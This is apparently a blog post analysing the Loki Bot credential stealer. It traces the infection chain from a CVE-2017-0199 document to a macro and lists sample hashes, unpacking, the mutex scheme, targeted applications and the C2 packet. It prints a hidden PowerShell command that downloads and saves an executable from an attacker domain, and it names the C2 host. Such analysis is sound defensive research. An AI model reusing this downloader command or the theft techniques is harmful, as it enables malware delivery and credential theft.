By that reason, I started to analyze the samples to get to the bottom of the matter. r your tranquillity, I must say that the samples are not related to “NotPetya" ransomware but they are related to an interesting malware which I am going to explain, dubbed “Loki Bot”.
Attack vector.
Loki Bot is a sensitive information stealer. Loki Bot can read private information from a large list of Windows programs and sends it to CnC.You can buy this malware on internet with differents modules and features.
Like some malware researchers said, the attack vector starts with a .doc file. This file exploits a known vulnerability (CVE-2017-0199 – Info) for download other file from a server (84.200.16.242/myguy.xls).
The downloaded .xls file has an embedded macro that downloads a binary file from another server using PowerShell.
We can find the script opening the xls file with an Hex Editor
After extract the script and execute it, the script will try to download a .exe file from french-cooking[.]com domain.
PowerShell command:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.]com/myguy.]exe[', 'C:\Users\d00rt\AppData\Roaming\45298.exe');
Finally when myguy.exe is executed, it tries to connect with the CnC, coffeinoffice.xyz
Let's see what happens with myguy.exe ;)
Loki Bot Analysis.
Analyzed sampleMD5 | A1D5895F85751DFE67D19CCCB51B051A |
SHA1 | 9288FB8E96D419586FC8C595DD95353D48E8A060 |
UNPACKING
This sample is protected with a custom packer, but finally it uses the RunPE technique to unpack itself, at this moment we can dump it and start a comfortable analysis.Unpacked MD5 | 49F3606755B12230BFF639361C7109A7 |
Unpacked SHA1 | 234A7174E67EEC394FAF5139BC79C69BF0EBFFB8 |
WINDOWS API
This sample is not easy to analyze, it has some techniques to make the analysis more difficult. For example, to perform a call to any function of Windows Api, it uses a special function. In order to make it works, the malware has to push three values, then the function will return a memory addres related to the function that it is looking for.Main functionality
Loki Bot initializes WSASTartup, then it creates a Mutex with the same name that the machine GUID MD5.
import hashlib
mutex_name = hashlib.md5(machine_GUID).hexdigest()[:24]
Later Lokibot collects sensitive information from the supported modules and sends it to CnC.
After stealing data, it gains persistence on the system and finally it waits the CnC commands in a loop.
SENSITIVE DATA
Loki Bot supports a lot of different Windows applications to steal information. In the following table you can find all the modules that I could identify during the analysis.Firefox | SoftwareNet | mSecure | Bitvise | 1Password |
IceDragon | FTPShell | vnc_files | WinFTP | Winbox |
Safari | NppFTP | BlazeFTP | MartinPrikryl | KDBX_files |
K_Meleon | MyFTP | FAStream_NetFile | FreshFTP | Enpass |
SeaMonkey | FTPBox | GoFTP | BitKinex | z_Mailing |
Flock | SherrodFTP | ESTSoft_FTP | UltraFXP | Opera_Mail |
Black_Hawk | FTPNow | DeluxeFTP | FTPNow2 | PostBox |
Lunascape | Nexus | TotalComander | VanDyke | FossaMail |
Comodo | XFTP | FTPGetter | OdinFTP | MailBox |
Opera | EasyFTP | WS_FTP | NCH_FLING | WinChips |
QtWeb | SFTP_NetDrive | FullTiltPoker | NCH_CLASSIC | Outlook |
QupZilla | AbleFTP | PokerStars | Kitty | YMail2 |
Vault | JaSFTP | ExpandDrive | ThunderBird | TrulyMail |
Cyberfox | Automize | Steed | FoxMail | spn_files |
Pale_Moon | Cyberduck | FlashFXP | PocoMail | TODODesktop |
WaterFox | FullSync | NovaFTP | IncrediMail | Stickies |
GoogleTark | FTPInfo | NetDrive | GmailNotifierPro | NoteFly |
SuperPutty | LinasFTP | TotalComander | dcf_files | Notezilla |
Syncovery | FileZilla | SmartFTP | 32BitFTP | StickyNotes |
FTPNavigato | StaffFTP | FarManager | RoboForm |
Loki Bot loads an array with different address and call them dynamically.
During my analysis, the malware got my gmail account data from Comodo/Dragon Browser and FileZilla config. (Look at stolen data, you can see passwords in plain text :O ).
Once the LokiBot has finished stealing data, it prepares a packet to send to CnC. The data is compressed by an algorithm.
The first data size was 0x2541 and now the size is 0xB27
The malware obtains the computer metadata to identify the stolen data with the computer where the stolen data was gotten. This metadata will be the header of the packet that will be send to CnC including some flags (data size, stolen data size per each module...) which I am not going to explain in depth in this post.
In the next image we see the final payload to send to CnC and the CnC domain: